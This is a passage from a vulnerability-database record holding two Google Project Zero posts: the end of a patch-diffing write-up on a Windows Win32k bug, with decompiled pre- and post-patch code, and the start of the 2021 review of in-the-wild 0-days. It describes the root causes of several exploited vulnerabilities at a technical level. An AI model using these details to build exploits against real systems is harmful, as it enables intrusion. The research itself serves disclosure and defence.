gptiRit->pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit->pq;\n\n++queue->cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread->ptlW32;\n\ncurrWin32Thread->ptlW32 = (_TL *)&threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2->ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. 
Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. 
Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-02T00:00:00", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "modified": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T23:27:23", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild 
[[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. 
If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. 
Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable. Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM4gCoxLJVRGTOOAa0G44m0K7JF0hFFDI02iBV7REJruq3uiZof8wNylU1aNxOte2oEhhj_5JM9tS0VOwgA-eiKIaQ_DdmTQtlC9OUKSRA6kes4_d_-BKyeZsJ2bxISU2HJmZRG-_kVtKguVM8-eo7mbHl1_zs8DUGnY5mD-BiWYz6ayl472_aq7G_wQ/s1200/image1.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? 
When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. 
It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghbECEc5FM4UnpQnlj4bXY2ZhDWB0OHbbzaiCJzHPMH_RFJ_XjWa0zHisBvl1zsG09xc-8NvmRdP_3JzT51nge8njHQowYPiDJv8SGngwdj9jPQRfXuJjIJdAAKVvItpE9Zfay-04clFQTGMMA2Xs7kS129D5uLGTV8z8mysT-DdJ8MTSB12jXaCIwew/s1200/image5.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKGqdhr0uqme9Ta6_IeeH8rLnVORZwThzr_k9HBwWDEdCBAyIaH-Pbza-H6uF9n5-oLmi6LJ7_xA3yI4AkLAvXR2f7e69P3e7RUesU49NJC0wQO6btb8Jr2FCblvcaqmILn3cDItLoPQnaKOKDVVRFdBNtPTxcsug-213zyZC7RtPa3AhRTmOjeGbtgQ/s1200/image2.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. 
When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmsfv3qdXGZszBVuvB72wozoL0eIwnbnzkCk-34BRZBF42BwEPSlJTZvr7ToosTWWZaGm6-5H0hLWsPVbpuFYVMKeXri8OWB2iIZsG2ZAfMz6q8c_EEXN7yllXpdFpW6l-TeEb_qpIVRRHJ2v9sIk-E54Y0ZX8WowkHS1dfRY-yVPs4J2PqGahA6d_WA/s1200/image3.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. 
Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read & write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. 
We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 
1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. 
[CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due to sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. 
For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEv2CTX5BusrQApQk6Qbg7Gw7nRaqnNvw9rM3vecZitny58CU_peuICwxubQvytpz0IsCl8FlbXIOcpi60ObfVdQK5BNDwxitqQmxXrOQvMMFt9DXgeDZu86EtZwcR58a-UXQlbsCAfoMcAgeaGnLUheSp0W3Ci1GY7lPa8WNHIPsGhBIT58qHBJd28A/s1200/image4.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. 
 \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), targets of the campaign initially received a .mht file, which prompted the user to open it in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free, where a user-controlled callback runs in between two actions using an object and the user frees the object during that callback, and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. 
Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and was predicted with the end-of-life of Windows 7 in 2020, which is why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. 
With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. 
The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxy_vsgAqv3MzrONfxltvMnnsPyONg6TGwm_XGBKBDrRrmjYmFQoSaBcjCAt5wH05oW9Bj531mWuO8l2MmKieN4O0Y--EXSGjsIMEfjUg_CAbBgkKic0_q6ezw0TMbQIaQP0zz9GiguCjQlEUwwtYBv5UOFL6HTMpdMS15v63QYSnG_zxowe7Gcz01lg/s1200/image6.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) & [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. 
It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) & 